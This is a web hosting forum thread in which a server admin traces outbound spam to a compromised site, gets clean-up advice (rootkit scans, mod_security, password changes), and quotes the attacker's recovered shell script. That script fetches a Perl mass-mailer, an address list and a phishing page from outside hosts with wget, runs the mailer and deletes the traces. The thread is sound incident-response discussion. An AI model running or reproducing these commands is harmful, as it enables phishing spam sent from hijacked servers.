• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

sending spam - Trace php mail script on server?

D

ddegroot

Guest
Hi all!

I got some problems with the email, the mail que is filled with spam. Its stil bussy with removing the spam from the Que. No problem here, just takes some time.

But is it posseble to trace the page who is sending the spam mails? I can see in the maillog that the spam is being send by the apache user, but not from what site...

I hope someone can help me with this!

Thanks in advance.

Dennis,
 
Search is your friend. There are numerous things you can/should do.

1. Install/update/run - RKHunter and CHKRootKit

2. Check /tmp for any scripts which should not be there.

3. Check ALL logs for any additional useful info:
/var/logs/*
/usr/local/psa/var/log/*
/home/httpd/vhosts/domain.com/statistics/logs/*
(/home/httpd/ on your system may be /var/www/ )

Info such as high number of connections by a particular IP address....
(there is a script posted here somewhere to assist in listing number of connections by IP, was posted not too long ago)

4. Install/configure mod_security This will go a LONG way towards keeping a lot of **** from getting onto your system, and keeping bad scripts from being able to run.

5. Change your root and admin passwords, check all user passwords to make sure they are not 'simple' passwords.

6. Check if any hosted domain is using any scripts (such as phpBB) which have any known exploits/vulnerabilities.

These are just a few beginning steps, but all should be done if nothing else.

There is no 'automatic' or 'easy' way to do some of these, other than manually going through and checking each domain. This comes with the job of being a server admin... or a hosting admin...

It is always easier to secure things beforehand than it is to clean it up afterwards.
 
Thanks for youre help,

I found a directory /tmp/.sp

Here where 3 files,
1 with all the email adresses
1 with a perl schript
1 with the mail.

---------- 1 apache wheel 981018 Nov 13 03:47 98.txt
---------- 1 apache wheel 1098 Nov 8 04:11 enviar.pl
---------- 1 apache wheel 10820 Nov 12 21:24 msn.html

still not shure who put them there, but found the source :)
 
I found the script whitch created the files and downloaded the program. Here is a part of the script. Maybe it is to use of someone. I also found in the log files of a customer the file in thear cgi-bin folder. But it has already been removed.

cd /tmp
mkdir .sp
cd /tmp/.sp
wget http://morpheusy.bounceme.net/txt/enviar.pl
wget http://home.graffiti.net/radioterra:graffiti.net/msn.html
wget http://inep.f5k.com/98.txt
perl enviar.pl 98.txt "[email protected]" "Urgente - Atualizacao do Messenger Necessaria - MSN" msn.html
rm -rf /tmp/.sp

It was repeating itself sometime. I found it in /tmp/.bash_history. Also fount a file "bash" in "/tmp/.r". Hope this is the end of this spam script.
 
Finding and deleting the files (for the moment) is fine. But if you do not do anything to shore up your server from being exploited again, then it will just happen again and again. Please see my earlier post, items 1, 4, 5, and 6. Especially 1, 4 and 5.
 
You must log in or register to reply here.

Similar threads

S
Question Emails being deleted by DMARC
Replies
5
Views
189
JVG
J
propz
Resolved Email Domain Blacklisting not working 100%
Replies
7
Views
897
Kaspar
K
I
Issue Mails sent by MAILER-DAEMON to spam
Replies
3
Views
982
Bobbbb
B
Cordal
Resolved stop sending spam
Replies
12
Views
1K
Robert Alexander
R
datea.services
Question Attempts to exceed outgoing limits: log of mails not sent
Replies
4
Views
508
Peter Debik
P
Back
Top